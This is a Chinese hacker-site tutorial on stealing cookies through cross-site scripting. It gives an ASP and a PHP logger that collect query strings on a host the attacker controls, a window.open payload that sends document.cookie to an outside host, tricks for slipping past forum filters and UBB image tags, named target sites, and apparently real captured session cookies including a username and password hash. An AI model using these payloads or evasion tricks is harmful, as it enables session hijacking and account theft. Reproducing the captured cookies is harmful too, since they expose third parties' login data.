| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 |

您现在的位置： 中国X黑客小组 >> 技术文章 >> 黑客技术 >> 黑客教学 >> 文章正文 用户登录 新用户注册

跨站攻击-偷cookies    热     ★★★ 【字体：小 大】
跨站攻击-偷cookies
作者：未知    文章来源：lams blog    点击数：    更新时间：2005-12-9
< %   msg=Request.ServerVariables("QUERY_STRING")   testfile=Server.MapPath("cook.txt")   set fs=server.CreateObject("scripting.filesystemobject")   set thisfile=fs.OpenTextFile(testfile,8,True,0)   thisfile.Writeline(""&msg& "")   thisfile.close   set fs = nothing   % >      < script>window.open(’http://www.aapet.com/co.asp?msg=’+document.cookie   1． 构造一个提交，目标是能够显示用户Cookie信息：   http://www.5460.net/txl/login/login.pl?username= &passwd=&ok.x=28&ok.y=6   2． 如果上面的请求获得预期的效果，那么我们就可以尝试下面的请求：   http://www.5460.net/txl/login/login.pl?username= &passwd=&ok.x=28&ok.y=6   其中http://www.notfound.org/info.php是你能够控制的某台主机上的一个脚本，功能是获取查询字符串的信息，内容如下：   $info = getenv("QUERY_STRING");   if ($info) {   $fp = fopen("info.txt","a");   fwrite($fp,$info."\n");   fclose($fp);   }   header("Location: http://www.5460.net");   注："%2B"为"+"的URL编码，并且这里只能用"%2B"，因为"+"将被作为空格处理。后面的header语句则纯粹是为了增加隐蔽性。   3． 如果上面的URL能够正确运行的话，下一步就…………   涉及到跨站技巧的问题。像大部份论坛，都过滤了javascript这个字符。有个小技巧是可以利用的，可以在论坛发的贴里将javascript写成ascii码。像j可以写成”j”   再如a可以写成”a”，你可以找一个ascii码表对照修改一下，这样成功率能高一点。还有，你要学会分析一下对方的ubb代码。像动网5.0以下论坛，你在[img]里写入和bbs3000一样的代码就不会成功，因为动网5.0以下，ubb代码http://这个地方当成图片地址了，结你提交的代码被分成了两段javascript:window.open(’和http://www.netsill.net/lcx/info.asp?msg=’+.); ，以至于我们提交的代码丧失了功能。难道就不能攻击了吗？当然不是，我们可以变换种方式提交，在[img]中插入代码如下：   javascript:window.open(’http://www.netsill.net/lcx/info.asp?msg   如下图：我偷的cookies:   msg=ASPSESSIONIDSSDCTDDC=IJNFFJBABCCGKBMFKHOKFJBI;%20ASPSESSIONIDAAQCQBAA=NLJPKNBANJNPDGFPENJFPJHE;%20joekoe%5Fonline=login%5Fid=&login%5Fpassword=&login%5Fusername=&guest%5Fname=%D3%CE%BF%CD38869331&cookies%5Ftrue=yes&vc%5Fup%5Fnews=jk8822;%20ASPSESSIONIDCCRDQBAB=NGGFCCCAEAECNNPOKHFOCJNK;%20ASPSESSIONIDQQBDSDDC=PEJBBFCAPKOKKLHBIMFEBPHA   msg=ASPSESSIONIDSSDCTDDC=IJNFFJBABCCGKBMFKHOKFJBI;%20ASPSESSIONIDAAQCQBAA=NLJPKNBANJNPDGFPENJFPJHE;%20joekoe%5Fonline=login%5Fpassword=b7f688e82b6451c2&login%5Fid=4&login%5Fusername=xgb&time%5Fload=2005%2D8%2D15+16%3A04%3A49&guest%5Fname=%D3%CE%BF%CD38869331&cookies%5Ftrue=yes&vc%5Fup%5Fnews=jk8822;%20ASPSESSIONIDCCRDQBAB=NGGFCCCAEAECNNPOKHFOCJNK;%20ASPSESSIONIDQQBDSDDC=PEJBBFCAPKOKKLHBIMFEBPHA
文章录入：IceRiver    责任编辑：IceRiver
	上一篇文章： 突破组策略运行限制 下一篇文章： 取代NBSI2：Opendatasource And Openrowset
【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关文章
				百度空间跨站攻击详解 俄罗斯网站遭大规模攻击 美领 一公司研发网络病毒攻击竞争 西方媒体诬称中国黑客攻击多 会话劫持攻击实战详解 不怕攻击！上网必学的八招安 外交部称我国未收到遭黑客攻 黑客攻击行为趋利化 出台网络 爆料：英国政府网络遭中国电 “免杀病毒”成为黑客的惯用

网友评论：（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）

关于我们 - 版权声明 - 帮助(？) - 广告服务 - 联系我们 - 友情链接 - 用户注册 -	Powered by ICE RIVER - STUDIO

» CnXHacker.CoM

© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved.